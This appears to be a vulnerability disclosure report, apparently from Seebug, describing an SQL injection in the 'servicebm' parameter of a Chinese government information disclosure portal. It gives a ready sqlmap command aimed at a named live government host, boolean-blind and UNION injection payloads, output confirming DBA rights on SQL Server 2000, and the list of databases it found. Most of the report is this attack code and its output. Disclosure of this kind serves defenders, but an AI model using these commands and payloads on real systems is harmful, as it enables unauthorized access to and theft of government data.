### Summary:
SQL
### Details:
SQL injection vulnerability at one location in a government information disclosure system.
The parameter is in a different file.
Injection point:
zfxxgk/serviceobjectinfo.jsp?servicebm=
The servicebm parameter is not filtered properly and is injectable.
Example on a government website:
```
sqlmap.py -u "http://xxgk.sihong.gov.cn/zfxxgk/serviceobjectinfo.jsp?servicebm=" --is-dba --dbs
```
```
---
Place: GET
Parameter: servicebm
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: servicebm=%' AND 2512=2512 AND '%'='
Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: servicebm=-5118%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(104)+CHAR(106)+CHAR(111)+CHAR(113)+CHAR(68)+CHAR(74)+CHAR(85)+CHAR(104)+CHAR(103)+CHAR(84)+CHAR(77)+CHAR(118)+CHAR(100)+CHAR(75)+CHAR(113)+CHAR(118)+CHAR(99)+CHAR(111)+CHAR(113),NULL,NULL--
---
[11:57:12] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000
current user is DBA: True
```
DBA privileges.
Listing the databases:
```
available databases [16]:
[*] gov
[*] jcms
[*] jcmsvc
[*] jis
[*] lm
[*] mailbook
[*] master
[*] model
[*] msdb
[*] newlm
[*] Northwind
[*] pubs
[*] sms
[*] tempdb
[*] vipchat
[*] xxgk
```
### Proof of vulnerability:
[![1.jpg](https://images.seebug.org/upload/201405/2022230917b784fd9ddc7b3eeab2e478a9423aaf.jpg)](https://images.seebug.org/upload/201405/2022230917b784fd9ddc7b3eeab2e478a9423aaf.jpg)